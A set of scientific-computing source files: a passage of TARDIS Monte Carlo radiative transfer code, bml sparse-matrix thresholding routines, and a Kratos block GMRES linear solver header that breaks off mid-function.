/* current position in list of continuum edges -> indicates which bound-free processes are possible */
int64_t current_continuum_id = rpacket_get_current_continuum_id(packet);
// Determine in which continuum the bf-absorption occurs
double nu = rpacket_get_nu(packet);
double chi_bf = rpacket_get_chi_boundfree(packet);
// get new zrand
double zrand = rk_double(mt_state);
double zrand_x_chibf = zrand * chi_bf;
int64_t ccontinuum = current_continuum_id; /* continuum_id of the continuum in which bf-absorption occurs */
while (storage->chi_bf_tmp_partial[ccontinuum] <= zrand_x_chibf)
{
ccontinuum++;
}
// Alternative way to choose a continuum for bf-absorption:
// error =
// binary_search(storage->chi_bf_tmp_partial, zrand_x_chibf, current_continuum_id,no_of_continuum_edges-1,&ccontinuum);
// if (error == TARDIS_ERROR_BOUNDS_ERROR) // x_insert < x[imin] -> set index equal to imin
// {
// ccontinuum = current_continuum_id;
// }
zrand = rk_double(mt_state);
if (zrand < storage->continuum_list_nu[ccontinuum] / nu)
{
// go to ionization energy
rpacket_set_status (packet, TARDIS_PACKET_STATUS_REABSORBED);
}
else
{
//go to the thermal pool
//create_kpacket(packet);
rpacket_set_status (packet, TARDIS_PACKET_STATUS_REABSORBED);
}
}
void
montecarlo_free_free_scatter(rpacket_t * packet, storage_model_t * storage, double distance, rk_state *mt_state)
{
rpacket_set_status (packet, TARDIS_PACKET_STATUS_REABSORBED);
}
void
montecarlo_line_scatter (rpacket_t * packet, storage_model_t * storage,
double distance, rk_state *mt_state)
{
int64_t line2d_idx = rpacket_get_next_line_id (packet)
* storage->no_of_shells + rpacket_get_current_shell_id (packet);
if (rpacket_get_virtual_packet (packet) == 0)
{
increment_j_blue_estimator (packet, storage, distance, line2d_idx);
}
double tau_line =
storage->line_lists_tau_sobolevs[line2d_idx];
double tau_continuum = rpacket_get_chi_continuum(packet) * distance;
double tau_combined = tau_line + tau_continuum;
rpacket_set_next_line_id (packet, rpacket_get_next_line_id (packet) + 1);
if (rpacket_get_next_line_id (packet) == storage->no_of_lines)
{
rpacket_set_last_line (packet, true);
}
if (rpacket_get_virtual_packet (packet) > 0)
{
rpacket_set_tau_event (packet,
rpacket_get_tau_event (packet) + tau_line);
}
else if (rpacket_get_tau_event (packet) < tau_combined)
{
double old_doppler_factor = move_packet (packet, storage, distance);
rpacket_set_mu (packet, 2.0 * rk_double (mt_state) - 1.0);
double inverse_doppler_factor = 1.0 / rpacket_doppler_factor (packet, storage);
double comov_energy = rpacket_get_energy (packet) * old_doppler_factor;
rpacket_set_energy (packet, comov_energy * inverse_doppler_factor);
storage->last_interaction_in_nu[rpacket_get_id (packet)] =
rpacket_get_nu (packet);
storage->last_line_interaction_in_id[rpacket_get_id (packet)] =
rpacket_get_next_line_id (packet) - 1;
storage->last_line_interaction_shell_id[rpacket_get_id (packet)] =
rpacket_get_current_shell_id (packet);
storage->last_interaction_type[rpacket_get_id (packet)] = 2;
int64_t emission_line_id = 0;
if (storage->line_interaction_id == 0)
{
emission_line_id = rpacket_get_next_line_id (packet) - 1;
}
else if (storage->line_interaction_id >= 1)
{
emission_line_id = macro_atom (packet, storage, mt_state);
}
storage->last_line_interaction_out_id[rpacket_get_id (packet)] =
emission_line_id;
rpacket_set_nu (packet,
storage->line_list_nu[emission_line_id] *
inverse_doppler_factor);
rpacket_set_nu_line (packet, storage->line_list_nu[emission_line_id]);
rpacket_set_next_line_id (packet, emission_line_id + 1);
rpacket_reset_tau_event (packet, mt_state);
rpacket_set_recently_crossed_boundary (packet, 0);
if (rpacket_get_virtual_packet_flag (packet) > 0)
{
bool virtual_close_line = false;
if (!rpacket_get_last_line (packet) &&
fabs (storage->line_list_nu[rpacket_get_next_line_id (packet)] -
rpacket_get_nu_line (packet)) <
(rpacket_get_nu_line (packet)* 1e-7))
{
virtual_close_line = true;
}
// QUESTIONABLE!!!
bool old_close_line = rpacket_get_close_line (packet);
rpacket_set_close_line (packet, virtual_close_line);
montecarlo_one_packet (storage, packet, 1, mt_state);
rpacket_set_close_line (packet, old_close_line);
virtual_close_line = false;
}
}
else
{
rpacket_set_tau_event (packet,
rpacket_get_tau_event (packet) - tau_line);
}
if (!rpacket_get_last_line (packet) &&
fabs (storage->line_list_nu[rpacket_get_next_line_id (packet)] -
rpacket_get_nu_line (packet)) < (rpacket_get_nu_line (packet)*
1e-7))
{
rpacket_set_close_line (packet, true);
}
}
static void
montecarlo_compute_distances (rpacket_t * packet, storage_model_t * storage)
{
// Check if the last line was the same nu as the current line.
if (rpacket_get_close_line (packet))
{
// If so set the distance to the line to 0.0
rpacket_set_d_line (packet, 0.0);
// Reset close_line.
rpacket_set_close_line (packet, false);
}
else
{
rpacket_set_d_boundary (packet,
compute_distance2boundary (packet, storage));
double d_line;
compute_distance2line (packet, storage, &d_line);
// FIXME MR: return status of compute_distance2line() is ignored
rpacket_set_d_line (packet, d_line);
compute_distance2continuum (packet, storage);
}
}
static montecarlo_event_handler_t
get_event_handler (rpacket_t * packet, storage_model_t * storage,
double *distance, rk_state *mt_state)
{
montecarlo_compute_distances (packet, storage);
double d_boundary = rpacket_get_d_boundary (packet);
double d_continuum = rpacket_get_d_continuum (packet);
double d_line = rpacket_get_d_line (packet);
montecarlo_event_handler_t handler;
if (d_line <= d_boundary && d_line <= d_continuum)
{
*distance = d_line;
handler = &montecarlo_line_scatter;
}
else if (d_boundary <= d_continuum)
{
*distance = d_boundary;
handler = &move_packet_across_shell_boundary;
}
else
{
*distance = d_continuum;
handler = montecarlo_continuum_event_handler(packet, storage, mt_state);
}
return handler;
}
montecarlo_event_handler_t
montecarlo_continuum_event_handler(rpacket_t * packet, storage_model_t * storage, rk_state *mt_state)
{
if (storage->cont_status == CONTINUUM_OFF)
{
return &montecarlo_thomson_scatter;
}
else
{
double zrand = (rk_double(mt_state));
double normaliz_cont_th = rpacket_get_chi_electron(packet)/rpacket_get_chi_continuum(packet);
double normaliz_cont_bf = rpacket_get_chi_boundfree(packet)/rpacket_get_chi_continuum(packet);
if (zrand < normaliz_cont_th)
{
//Return the electron scatter event function
return &montecarlo_thomson_scatter;
}
else if (zrand < (normaliz_cont_th + normaliz_cont_bf))
{
//Return the bound-free scatter event function
return &montecarlo_bound_free_scatter;
}
else
{
//Return the free-free scatter event function
return &montecarlo_free_free_scatter;
}
}
}
int64_t
montecarlo_one_packet_loop (storage_model_t * storage, rpacket_t * packet,
int64_t virtual_packet, rk_state *mt_state)
{
rpacket_set_tau_event (packet, 0.0);
rpacket_set_nu_line (packet, 0.0);
rpacket_set_virtual_packet (packet, virtual_packet);
rpacket_set_status (packet, TARDIS_PACKET_STATUS_IN_PROCESS);
// Initializing tau_event if it's a real packet.
if (virtual_packet == 0)
{
rpacket_reset_tau_event (packet,mt_state);
}
// For a virtual packet tau_event is the sum of all the tau's that the packet passes.
while (rpacket_get_status (packet) == TARDIS_PACKET_STATUS_IN_PROCESS)
{
// Check if we are at the end of line list.
if (!rpacket_get_last_line (packet))
{
rpacket_set_nu_line (packet,
storage->
line_list_nu[rpacket_get_next_line_id
(packet)]);
}
double distance;
get_event_handler (packet, storage, &distance, mt_state) (packet, storage,
distance, mt_state);
if (virtual_packet > 0 && rpacket_get_tau_event (packet) > 10.0)
{
rpacket_set_tau_event (packet, 100.0);
rpacket_set_status (packet, TARDIS_PACKET_STATUS_EMITTED);
}
}
if (virtual_packet > 0)
{
rpacket_set_energy (packet,
rpacket_get_energy (packet) * exp (-1.0 *
rpacket_get_tau_event
(packet)));
}
return rpacket_get_status (packet) ==
TARDIS_PACKET_STATUS_REABSORBED ? 1 : 0;
}
void
montecarlo_main_loop(storage_model_t * storage, int64_t virtual_packet_flag, int nthreads, unsigned long seed)
{
storage->virt_packet_nus = (double *)malloc(sizeof(double) * storage->no_of_packets);
storage->virt_packet_energies = (double *)malloc(sizeof(double) * storage->no_of_packets);
storage->virt_packet_last_interaction_in_nu = (double *)malloc(sizeof(double) * storage->no_of_packets);
storage->virt_packet_last_interaction_type = (int64_t *)malloc(sizeof(int64_t) * storage->no_of_packets);
storage->virt_packet_last_line_interaction_in_id = (int64_t *)malloc(sizeof(int64_t) * storage->no_of_packets);
storage->virt_packet_last_line_interaction_out_id = (int64_t *)malloc(sizeof(int64_t) * storage->no_of_packets);
storage->virt_packet_count = 0;
storage->virt_array_size = storage->no_of_packets;
#ifdef WITHOPENMP
fprintf(stderr, "Running with OpenMP - %d threads\n", nthreads);
omp_set_dynamic(0);
omp_set_num_threads(nthreads);
#pragma omp parallel
{
rk_state mt_state;
rk_seed (seed + omp_get_thread_num(), &mt_state);
#pragma omp for
#else
fprintf(stderr, "Running without OpenMP\n");
rk_state mt_state;
rk_seed (seed, &mt_state);
#endif
for (int64_t packet_index = 0; packet_index < storage->no_of_packets; packet_index++)
{
int reabsorbed = 0;
rpacket_t packet;
rpacket_set_id(&packet, packet_index);
rpacket_init(&packet, storage, packet_index, virtual_packet_flag);
if (virtual_packet_flag > 0)
{
reabsorbed = montecarlo_one_packet(storage, &packet, -1, &mt_state);
}
reabsorbed = montecarlo_one_packet(storage, &packet, 0, &mt_state);
storage->output_nus[packet_index] = rpacket_get_nu(&packet);
if (reabsorbed == 1)
{
storage->output_energies[packet_index] = -rpacket_get_energy(&packet);
}
else
{
storage->output_energies[packet_index] = rpacket_get_energy(&packet);
}
}
#ifdef WITHOPENMP
}
#endif
}
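#if 0
/* Hedged sketch (not part of TARDIS): the per-thread seeding pattern used
   above, in isolation. Offsetting the base seed by the thread number gives
   each thread an independent, reproducible random stream; n and do_work()
   are hypothetical stand-ins for a loop bound and a per-item kernel. */
#pragma omp parallel
{
  rk_state state;
  rk_seed (seed + omp_get_thread_num (), &state);
  #pragma omp for
  for (int64_t i = 0; i < n; ++i)
    do_work (i, &state);
}
#endif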
|
bml_threshold_ellsort_typed.c | #include "../../macros.h"
#include "../../typed.h"
#include "../bml_allocate.h"
#include "../bml_parallel.h"
#include "../bml_threshold.h"
#include "../bml_types.h"
#include "bml_allocate_ellsort.h"
#include "bml_threshold_ellsort.h"
#include "bml_types_ellsort.h"
#include <complex.h>
#include <math.h>
#include <stdlib.h>
#include <string.h>
#ifdef _OPENMP
#include <omp.h>
#endif
/** Threshold a matrix.
*
* \ingroup threshold_group
*
* \param A The matrix to be thresholded
* \param threshold Threshold value
* \return the thresholded A
*/
bml_matrix_ellsort_t *TYPED_FUNC(
bml_threshold_new_ellsort) (
bml_matrix_ellsort_t * A,
double threshold)
{
int N = A->N;
int M = A->M;
bml_matrix_ellsort_t *B =
TYPED_FUNC(bml_zero_matrix_ellsort) (N, M, A->distribution_mode);
REAL_T *A_value = (REAL_T *) A->value;
int *A_index = A->index;
int *A_nnz = A->nnz;
int *A_localRowMin = A->domain->localRowMin;
int *A_localRowMax = A->domain->localRowMax;
REAL_T *B_value = (REAL_T *) B->value;
int *B_index = B->index;
int *B_nnz = B->nnz;
int myRank = bml_getMyRank();
#pragma omp parallel for \
shared(N, M, A_value, A_index, A_nnz) \
shared(A_localRowMin, A_localRowMax, myRank) \
shared(B_value, B_index, B_nnz)
//for (int i = 0; i < N; i++)
for (int i = A_localRowMin[myRank]; i < A_localRowMax[myRank]; i++)
{
for (int j = 0; j < A_nnz[i]; j++)
{
if (is_above_threshold(A_value[ROWMAJOR(i, j, N, M)], threshold))
{
B_value[ROWMAJOR(i, B_nnz[i], N, M)] =
A_value[ROWMAJOR(i, j, N, M)];
B_index[ROWMAJOR(i, B_nnz[i], N, M)] =
A_index[ROWMAJOR(i, j, N, M)];
B_nnz[i]++;
}
}
}
return B;
}
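#if 0
/* Hedged usage sketch (not part of this file): create a thresholded copy,
   leaving A intact. The generic bml_threshold_new() dispatcher declared in
   bml_threshold.h is assumed to route to the typed function above for
   ellsort matrices. */
bml_matrix_t *B = bml_threshold_new (A, 1.0e-5);
#endif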
/** Threshold a matrix in place.
*
* \ingroup threshold_group
*
* \param A The matrix to be thresholded
* \param threshold Threshold value
* \return the thresholded A
*/
void TYPED_FUNC(
bml_threshold_ellsort) (
bml_matrix_ellsort_t * A,
double threshold)
{
int N = A->N;
int M = A->M;
REAL_T *A_value = (REAL_T *) A->value;
int *A_index = A->index;
int *A_nnz = A->nnz;
int *A_localRowMin = A->domain->localRowMin;
int *A_localRowMax = A->domain->localRowMax;
int myRank = bml_getMyRank();
int rlen;
#pragma omp parallel for \
private(rlen) \
shared(N,M,A_value,A_index,A_nnz) \
shared(A_localRowMin, A_localRowMax, myRank)
//for (int i = 0; i < N; i++)
for (int i = A_localRowMin[myRank]; i < A_localRowMax[myRank]; i++)
{
rlen = 0;
for (int j = 0; j < A_nnz[i]; j++)
{
if (is_above_threshold(A_value[ROWMAJOR(i, j, N, M)], threshold))
{
if (rlen < j)
{
A_value[ROWMAJOR(i, rlen, N, M)] =
A_value[ROWMAJOR(i, j, N, M)];
A_index[ROWMAJOR(i, rlen, N, M)] =
A_index[ROWMAJOR(i, j, N, M)];
}
rlen++;
}
}
A_nnz[i] = rlen;
}
}
|
mixedup_linear_solver.h | //    |  /           |
//    ' /   __| _` | __|  _ \   __|
//    . \  |   (   | |   (   |\__ `
//   _|\_\_|  \__,_|\__|\___/ ____/
//                   Multi-Physics
//
// License: BSD License
// Kratos default license: kratos/license.txt
//
// Main authors: Riccardo Rossi
//
#if !defined(KRATOS_MIXEDUP_SOLVER_H_INCLUDED )
#define KRATOS_MIXEDUP_SOLVER_H_INCLUDED
// System includes
#include <string>
#include <iostream>
#include <sstream>
#include <cstddef>
// External includes
// Project includes
#include "includes/define.h"
#include "reorderer.h"
#include "includes/model_part.h"
#include "linear_solvers/iterative_solver.h"
#include <boost/numeric/ublas/vector.hpp>
#include "utilities/openmp_utils.h"
namespace Kratos
{
///@name Kratos Globals
///@{
///@}
///@name Type Definitions
///@{
///@}
///@name Enum's
///@{
///@}
///@name Functions
///@{
///@}
///@name Kratos Classes
///@{
/** This solver is designed for the solution of mixed U-P problems.
* It uses a block structure dividing the matrix into UU, PP, UP and PU blocks
* and uses "standard" linear solvers for the different blocks, as well as a GMRES for the outer part
*/
template<class TSparseSpaceType, class TDenseSpaceType,
class TPreconditionerType = Preconditioner<TSparseSpaceType, TDenseSpaceType>,
class TReordererType = Reorderer<TSparseSpaceType, TDenseSpaceType> >
class MixedUPLinearSolver :
public IterativeSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>
{
public:
///@name Type Definitions
///@{
/// Pointer definition of MixedUPLinearSolver
KRATOS_CLASS_POINTER_DEFINITION (MixedUPLinearSolver);
typedef IterativeSolver<TSparseSpaceType, TDenseSpaceType, TPreconditionerType, TReordererType> BaseType;
typedef typename TSparseSpaceType::MatrixType SparseMatrixType;
typedef typename TSparseSpaceType::VectorType VectorType;
typedef typename TDenseSpaceType::MatrixType DenseMatrixType;
typedef typename TDenseSpaceType::VectorType DenseVectorType;
typedef std::size_t SizeType;
///@}
///@name Life Cycle
///@{
/// Default constructor.
MixedUPLinearSolver (typename LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType>::Pointer psolver_UU_block,
typename LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType>::Pointer psolver_PP_block,
double NewMaxTolerance,
unsigned int NewMaxIterationsNumber,
unsigned int m
) : BaseType (NewMaxTolerance, NewMaxIterationsNumber)
{
//saving the linear solvers to be used in the solution process
mpsolver_UU_block = psolver_UU_block;
mpsolver_PP_block = psolver_PP_block;
mBlocksAreAllocated = false;
mis_initialized = false;
mm = m;
}
MixedUPLinearSolver(Parameters settings,
typename LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType>::Pointer psolver_UU_block,
typename LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType>::Pointer psolver_PP_block
): BaseType ()
{
KRATOS_TRY
Parameters default_parameters( R"(
{
"solver_type": "MixedUPLinearSolver",
"velocity_solver" : {
"solver_type":"BICGSTABSolver"
},
"pressure_solver" : {
"solver_type":"CGSolver"
},
"tolerance" : 1.0e-6,
"max_iteration" : 200,
"gmres_krylov_space_dimension" : 100
} )" );
//now validate against defaults -- this also ensures no type mismatch
settings.ValidateAndAssignDefaults(default_parameters);
this->SetTolerance( settings["tolerance"].GetDouble() );
this->SetMaxIterationsNumber( settings["max_iteration"].GetInt() );
mm = settings["gmres_krylov_space_dimension"].GetInt();
//storing other data
mpsolver_UU_block = psolver_UU_block;
mpsolver_PP_block = psolver_PP_block;
mBlocksAreAllocated = false;
mis_initialized = false;
KRATOS_CATCH("")
}
/// Copy constructor.
MixedUPLinearSolver (const MixedUPLinearSolver& Other)
{
KRATOS_THROW_ERROR (std::logic_error,"copy constructor not correctly implemented","");
}
/// Destructor.
~MixedUPLinearSolver() override {}
///@}
///@name Operators
///@{
/// Assignment operator.
MixedUPLinearSolver& operator= (const MixedUPLinearSolver& Other)
{
return *this;
}
///@}
///@name Operations
///@{
/** This function is designed to be called as few times as possible. It creates the data structures
* that only depend on the connectivity of the matrix (and not on its coefficients)
* so that the memory can be allocated once and expensive operations can be done only when strictly
* needed
@param rA. System matrix
@param rX. Solution vector. it's also the initial guess for iterative linear solvers.
@param rB. Right hand side vector.
*/
void Initialize (SparseMatrixType& rA, VectorType& rX, VectorType& rB) override
{
if (mBlocksAreAllocated == true)
{
mpsolver_UU_block->Initialize(mK, mu, mru);
mpsolver_PP_block->Initialize(mS, mp, mrp);
mis_initialized = true;
}
else
{
std::cout << "linear solver intialization is deferred to the moment at which blocks are available" << std::endl;
}
}
/** This function is designed to be called every time the coefficients change in the system
* that is, normally at the beginning of each solve.
* For example if we are implementing a direct solver, this is the place to do the factorization
* so that then the backward substitution can be performed effectively more than once
@param rA. System matrix
@param rX. Solution vector. it's also the initial guess for iterative linear solvers.
@param rB. Right hand side vector.
*/
void InitializeSolutionStep (SparseMatrixType& rA, VectorType& rX, VectorType& rB) override
{
//copy to local matrices
if (mBlocksAreAllocated == false)
{
FillBlockMatrices (true, rA, mK, mG, mD, mS);
mBlocksAreAllocated = true;
}
else
{
FillBlockMatrices (false, rA, mK, mG, mD, mS);
mBlocksAreAllocated = true;
}
if(mis_initialized == false) this->Initialize(rA,rX,rB);
//initialize solvers
mpsolver_UU_block->InitializeSolutionStep(mK, mu, mru);
mpsolver_PP_block->InitializeSolutionStep(mS, mp, mrp);
}
/** This function actually performs the solution work, eventually taking advantage of what was done before in the
* Initialize and InitializeSolutionStep functions.
@param rA. System matrix
@param rX. Solution vector. it's also the initial guess for iterative linear solvers.
@param rB. Right hand side vector.
*/
void PerformSolutionStep (SparseMatrixType& rA, VectorType& rX, VectorType& rB) override
{
unsigned int m = mm;
unsigned int max_iter = BaseType::GetMaxIterationsNumber();
double tol = BaseType::GetTolerance();
gmres_solve (rA,rX,rB,m,max_iter,tol);
}
/** This function is designed to be called at the end of the solve step.
* for example this is the place to remove any data that we do not want to save for later
@param rA. System matrix
@param rX. Solution vector. it's also the initial guess for iterative linear solvers.
@param rB. Right hand side vector.
*/
void FinalizeSolutionStep (SparseMatrixType& rA, VectorType& rX, VectorType& rB) override
{
mpsolver_UU_block->FinalizeSolutionStep(mK, mu, mru);
mpsolver_PP_block->FinalizeSolutionStep(mS, mp, mrp);
}
/** This function is designed to clean up all internal data in the solver.
* Clear is designed to leave the solver object as if newly created.
* After a clear a new Initialize is needed
*/
void Clear() override
{
mK.clear();
mG.clear();
mD.clear();
mS.clear();
mBlocksAreAllocated = false;
mpsolver_UU_block->Clear();
mpsolver_PP_block->Clear();
mu.clear();
mp.clear();
mru.clear();
mrp.clear();
mis_initialized = false;
}
/** Normal solve method.
Solves the linear system Ax=b and puts the result on SystemVector& rX.
rX is also the initial guess for iterative methods.
@param rA. System matrix
@param rX. Solution vector. it's also the initial
guess for iterative linear solvers.
@param rB. Right hand side vector.
*/
bool Solve(SparseMatrixType& rA, VectorType& rX, VectorType& rB) override
{
if (mis_initialized == false)
this->Initialize (rA,rX,rB);
this->InitializeSolutionStep (rA,rX,rB);
this->PerformSolutionStep (rA,rX,rB);
this->FinalizeSolutionStep (rA,rX,rB);
return false;
}
/** Multi solve method for solving a set of linear systems with same coefficient matrix.
Solves the linear system Ax=b and puts the result on SystemVector& rX.
rX is also the initial guess for iterative methods.
@param rA. System matrix
@param rX. Solution vector. it's also the initial
guess for iterative linear solvers.
@param rB. Right hand side vector.
*/
bool Solve (SparseMatrixType& rA, DenseMatrixType& rX, DenseMatrixType& rB) override
{
return false;
}
/** Eigenvalue and eigenvector solve method for derived eigensolvers */
void Solve (SparseMatrixType& K,
SparseMatrixType& M,
DenseVectorType& Eigenvalues,
DenseMatrixType& Eigenvectors) override
{}
/** Some solvers may require a minimum degree of knowledge of the structure of the matrix. To make an example
* when solving a mixed u-p problem, it is important to identify the row associated to v and p.
* another example is the automatic prescription of rotation null-space for smoothed-aggregation solvers
* which require knowledge on the spatial position of the nodes associated to a given dof.
* This function tells if the solver requires such data
*/
bool AdditionalPhysicalDataIsNeeded() override
{
return true;
}
/** Some solvers may require a minimum degree of knowledge of the structure of the matrix. To make an example
* when solving a mixed u-p problem, it is important to identify the row associated to v and p.
* another example is the automatic prescription of rotation null-space for smoothed-aggregation solvers
* which require knowledge on the spatial position of the nodes associated to a given dof.
* This function is the place to eventually provide such data
*/
void ProvideAdditionalData (
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB,
typename ModelPart::DofsArrayType& rdof_set,
ModelPart& r_model_part
) override
{
//count pressure dofs
unsigned int n_pressure_dofs = 0;
unsigned int tot_active_dofs = 0;
for (ModelPart::DofsArrayType::iterator it = rdof_set.begin(); it!=rdof_set.end(); it++)
{
if (it->EquationId() < rA.size1())
{
tot_active_dofs += 1;
if (it->GetVariable().Key() == PRESSURE)
n_pressure_dofs += 1;
}
}
if (tot_active_dofs != rA.size1() )
KRATOS_THROW_ERROR (std::logic_error,"total system size does not coincide with the free dof map","");
//resize arrays as needed
mpressure_indices.resize (n_pressure_dofs,false);
unsigned int other_dof_size = tot_active_dofs - n_pressure_dofs;
mother_indices.resize (other_dof_size,false);
mglobal_to_local_indexing.resize (tot_active_dofs,false);
mis_pressure_block.resize (tot_active_dofs,false);
//construct aux_lists as needed
//"other_counter[i]" i will contain the position in the global system of the i-th NON-pressure node
//"pressure_counter[i]" will contain the in the global system of the i-th NON-pressure node
//
//mglobal_to_local_indexing[i] will contain the position in the local blocks of the
unsigned int pressure_counter = 0;
unsigned int other_counter = 0;
unsigned int global_pos = 0;
for (ModelPart::DofsArrayType::iterator it = rdof_set.begin(); it!=rdof_set.end(); it++)
{
if (it->EquationId() < rA.size1())
{
if (it->GetVariable().Key() == PRESSURE)
{
mpressure_indices[pressure_counter] = global_pos;
mglobal_to_local_indexing[global_pos] = pressure_counter;
mis_pressure_block[global_pos] = true;
pressure_counter++;
}
else
{
mother_indices[other_counter] = global_pos;
mglobal_to_local_indexing[global_pos] = other_counter;
mis_pressure_block[global_pos] = false;
other_counter++;
}
global_pos++;
}
}
}
///@}
///@name Access
///@{
///@}
///@name Inquiry
///@{
///@}
///@name Input and output
///@{
/// Turn back information as a string.
std::string Info() const override
{
return "Linear solver";
}
/// Print information about this object.
void PrintInfo (std::ostream& rOStream) const override
{
rOStream << "Linear solver";
}
/// Print object's data.
void PrintData (std::ostream& rOStream) const override
{
}
///@}
///@name Friends
///@{
///@}
protected:
///@name Protected static Member Variables
///@{
///@}
///@name Protected member Variables
///@{
///@}
///@name Protected Operators
///@{
///this function generates the subblocks of matrix A
///as A = ( K G ) u
/// ( D S ) p
/// subblocks are allocated or not, depending on the value of "need_allocation"
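///(a note inferred from the call signature, not from the original comments:
///CalculateShurComplement below appears to build the approximate pressure
///Schur complement S = L - D * diag(K)^{-1} * G, with diag(K) obtained by
///lumping in ComputeDiagonalByLumping)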
void FillBlockMatrices (bool need_allocation, SparseMatrixType& rA, SparseMatrixType& K, SparseMatrixType& G, SparseMatrixType& D, SparseMatrixType& S )
{
KRATOS_TRY
//get access to A data
const std::size_t* index1 = rA.index1_data().begin();
const std::size_t* index2 = rA.index2_data().begin();
const double* values = rA.value_data().begin();
SparseMatrixType L(mpressure_indices.size(),mpressure_indices.size() );
if (need_allocation == true)
{
K.clear();
G.clear();
D.clear();
S.clear();
L.clear();
//do allocation
K.resize (mother_indices.size() ,mother_indices.size() );
G.resize (mother_indices.size() ,mpressure_indices.size() );
D.resize (mpressure_indices.size(),mother_indices.size() );
S.resize (mpressure_indices.size(),mpressure_indices.size() );
mrp.resize(mpressure_indices.size() );
mru.resize(mother_indices.size() );
mp.resize(mpressure_indices.size());
mu.resize(mother_indices.size());
//KRATOS_WATCH (mglobal_to_local_indexing);
//allocate the blocks by push_back
for (unsigned int i=0; i<rA.size1(); i++)
{
unsigned int row_begin = index1[i];
unsigned int row_end = index1[i+1];
unsigned int local_row_id = mglobal_to_local_indexing[i];
if ( mis_pressure_block[i] == false) //either K or G
{
for (unsigned int j=row_begin; j<row_end; j++)
{
unsigned int col_index = index2[j];
double value = values[j];
unsigned int local_col_id = mglobal_to_local_indexing[col_index];
if (mis_pressure_block[col_index] == false) //K block
K.push_back ( local_row_id, local_col_id, value);
else //G block
G.push_back ( local_row_id, local_col_id, value);
}
}
else //either D or S
{
for (unsigned int j=row_begin; j<row_end; j++)
{
unsigned int col_index = index2[j];
double value = values[j];
unsigned int local_col_id = mglobal_to_local_indexing[col_index];
if (mis_pressure_block[col_index] == false) //D block
D.push_back ( local_row_id, local_col_id, value);
else //S block
L.push_back ( local_row_id, local_col_id, value);
}
}
}
//allocate the schur complement
ConstructSystemMatrix(S,G,D,L);
VectorType diagK (mother_indices.size() );
ComputeDiagonalByLumping (K,diagK);
//fill the Schur complement
CalculateShurComplement(S,K,G,D,L,diagK);
}
else //allocation is not needed so only do copying
{
for (unsigned int i=0; i<rA.size1(); i++)
{
unsigned int row_begin = index1[i];
unsigned int row_end = index1[i+1];
unsigned int local_row_id = mglobal_to_local_indexing[i];
if ( mis_pressure_block[i] == false ) //either K or G
{
for (unsigned int j=row_begin; j<row_end; j++)
{
unsigned int col_index = index2[j];
double value = values[j];
unsigned int local_col_id = mglobal_to_local_indexing[col_index];
if (mis_pressure_block[col_index] == false) //K block
K( local_row_id, local_col_id) = value;
else //G block
G( local_row_id, local_col_id) = value;
}
}
else //either D or S
{
for (unsigned int j=row_begin; j<row_end; j++)
{
unsigned int col_index = index2[j];
double value = values[j];
unsigned int local_col_id = mglobal_to_local_indexing[col_index];
if (mis_pressure_block[col_index] == false) //D block
D( local_row_id, local_col_id) = value;
else //S block
L( local_row_id, local_col_id) = value;
}
}
}
VectorType diagK (mother_indices.size() );
ComputeDiagonalByLumping (K,diagK);
//fill the Schur complement
CalculateShurComplement(S,K,G,D,L,diagK);
}
KRATOS_CATCH ("")
}
///@}
///@name Protected Operations
///@{
///@}
///@name Protected Access
///@{
///@}
///@name Protected Inquiry
///@{
///@}
///@name Protected LifeCycle
///@{
///@}
private:
///@name Static Member Variables
///@{
///@}
///@name Member Variables
///@{
/// A counted pointer to the reorderer object.
typename LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType>::Pointer mpsolver_UU_block;
typename LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType>::Pointer mpsolver_PP_block;
unsigned int mm;
bool mBlocksAreAllocated;
bool mis_initialized;
DenseVector<unsigned int> mpressure_indices;
DenseVector<unsigned int> mother_indices;
DenseVector<int> mglobal_to_local_indexing;
DenseVector<int> mis_pressure_block;
SparseMatrixType mK;
SparseMatrixType mG;
SparseMatrixType mD;
SparseMatrixType mS;
VectorType mrp;
VectorType mru;
VectorType mp;
VectorType mu;
///@}
///@name Private Operators
///@{
inline void GeneratePlaneRotation (const double &dx, const double &dy, double &cs, double &sn)
{
if (dy == 0.0)
{
cs = 1.0;
sn = 0.0;
}
else if (dx == 0.0)
{
cs = 0.0;
sn = 1.0;
}
else
{
const double rnorm = 1.0/sqrt (dx*dx + dy*dy);
cs = fabs (dx) * rnorm;
sn = cs * dy / dx;
}
}
inline void ApplyPlaneRotation (double &dx, double &dy, const double &cs, const double &sn)
{
double temp = cs * dx + sn * dy;
dy = cs * dy - sn * dx;
dx = temp;
}
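// GeneratePlaneRotation and ApplyPlaneRotation implement the Givens
// rotations that keep the GMRES Hessenberg matrix upper triangular:
// [dx'; dy'] = [cs sn; -sn cs] * [dx; dy], with cs and sn chosen so that
// applying the rotation to the generating pair zeroes dy.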
void Update (VectorType& y, VectorType& x, int k, Matrix& h, VectorType& s, std::vector< VectorType >& V)
{
for (unsigned int i=0; i<s.size(); i++)
y[i] = s[i];
/* for(unsigned int i=s.size(); i<y.size(); i++)
y[i] = 0.0;*/
// Backsolve:
for (int i = k; i >= 0; --i)
{
y (i) /= h (i,i);
for (int j = i - 1; j >= 0; --j)
y (j) -= h (j,i) * y (i);
}
//create new search dir
for (int j = 0; j <= k; ++j)
TSparseSpaceType::UnaliasedAdd (x, y[j], V[j]); // x += y(j)* V[j];
}
int gmres_solve ( SparseMatrixType& A,
VectorType& x,
const VectorType& b,
unsigned int& m,
unsigned int& max_iter,
double& tol)
{
const unsigned int dim = A.size1();
if (m == 0)
KRATOS_THROW_ERROR (std::logic_error,"the dimension of the GMRES krylov space can not be set to zero. Please change the value of m","")
if (m > max_iter)
m = max_iter;
VectorType s (m+1), sn (m+1), w (dim), r (dim), y (m+1);
VectorType cs (m+1);
Matrix H (m+1, m+1);
int restart = 0;
//preconditioner solve b and store in Minv_b
VectorType preconditioned_b (dim);
//TSparseSpaceType::Copy(b, preconditioned_b); //preconditioned_b=b
//apply preconditioner
SolveBlockPreconditioner (b,preconditioned_b);
double normb = TSparseSpaceType::TwoNorm (preconditioned_b);
/*KRATOS_WATCH(normb);*/
if (normb < 1e-16) //ARBITRARY SMALL NUMBER!
{
normb = 1e-16;
}
//r = b - Ax
TSparseSpaceType::Mult (A,x,r);
